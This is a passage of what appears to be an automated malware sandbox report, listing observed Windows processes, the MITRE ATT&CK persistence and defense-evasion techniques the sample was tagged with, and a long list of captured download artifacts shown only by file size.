C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: LoadsDriver
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x2241⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {A93D8764-8FF3-462F-8120-46B3D3608D96} S-1-5-18:NT AUTHORITY\System:Service:1⤵
Network
MITRE ATT&CK Enterprise v6
Persistence
Account Manipulation
1Bootkit
1Hidden Files and Directories
3Modify Existing Service
3Registry Run Keys / Startup Folder
3Scheduled Task
1Winlogon Helper DLL
1Defense Evasion
Disabling Security Tools
2File Deletion
2File and Directory Permissions Modification
1Hidden Files and Directories
3Impair Defenses
1Install Root Certificate
1Modify Registry
10Scripting
1Virtualization/Sandbox Evasion
2Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
16KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
5.5MB
-
Filesize
5.5MB
-
Filesize
4KB
-
Filesize
2.5MB
-
Filesize
132KB
-
Filesize
1.3MB
-
Filesize
132KB
-
Filesize
1.6MB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
328KB
-
Filesize
328KB
-
Filesize
328KB
-
Filesize
6.9MB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
1.0MB
-
Filesize
64KB
-
Filesize
24KB
-
Filesize
4KB
-
Filesize
68KB
-
Filesize
140KB
-
Filesize
4KB
-
Filesize
908KB
-
Filesize
68KB
-
Filesize
4KB
-
Filesize
180KB
-
Filesize
332KB
-
Filesize
8KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
60KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
6.9MB
-
Filesize
8KB
-
Filesize
1.2MB
-
Filesize
1.0MB
-
Filesize
1.1MB
-
Filesize
48KB
-
Filesize
52KB
-
Filesize
1.0MB
-
Filesize
1.0MB
-
Filesize
1.4MB
-
Filesize
2.5MB
-
Filesize
68KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
68KB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
2.5MB
-
Filesize
68KB
-
Filesize
1.0MB
-
Filesize
180KB
-
Filesize
16KB
-
Filesize
36KB
-
Filesize
3.2MB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
912KB
-
Filesize
232KB
-
Filesize
6.9MB
-
Filesize
308KB
-
Filesize
4KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
324KB
-
Filesize
16KB
-
Filesize
1.6MB
-
Filesize
1.9MB
-
Filesize
2.0MB
-
Filesize
1.6MB
-
Filesize
4KB
-
Filesize
36KB
-
Filesize
44KB
-
Filesize
6.9MB
-
Filesize
92KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
68KB
-
Filesize
2.5MB
-
Filesize
20KB
-
Filesize
64KB
-
Filesize
628KB
-
Filesize
1.0MB
-
Filesize
20KB
-
Filesize
56KB
-
Filesize
8KB
-
Filesize
328KB
-
Filesize
6.9MB
-
Filesize
328KB
-
Filesize
16KB
-
Filesize
3.2MB
-
Filesize
4KB
-
Filesize
332KB
-
Filesize
6.9MB
-
Filesize
4.7MB
-
Filesize
68KB
-
Filesize
1.9MB
-
Filesize
4.7MB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
324KB
-
Filesize
372KB
-
Filesize
2.1MB
-
Filesize
20KB
-
Filesize
20KB
-
Filesize
1.9MB
-
Filesize
68KB
-
Filesize
908KB
-
Filesize
1.6MB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
232KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
232KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
232KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
872KB
-
Filesize
52KB
-
Filesize
320KB
-
Filesize
6.9MB
-
Filesize
320KB
-
Filesize
320KB
-
Filesize
328KB
-
Filesize
328KB
-
Filesize
328KB
-
Filesize
6.9MB
-
Filesize
6.9MB
-
Filesize
304KB
-
Filesize
304KB
-
Filesize
304KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
328KB
-
Filesize
6.9MB
-
Filesize
328KB
-
Filesize
4KB
-
Filesize
96KB
-
Filesize
4KB
-
Filesize
6.9MB
-
Filesize
40KB
-
Filesize
976KB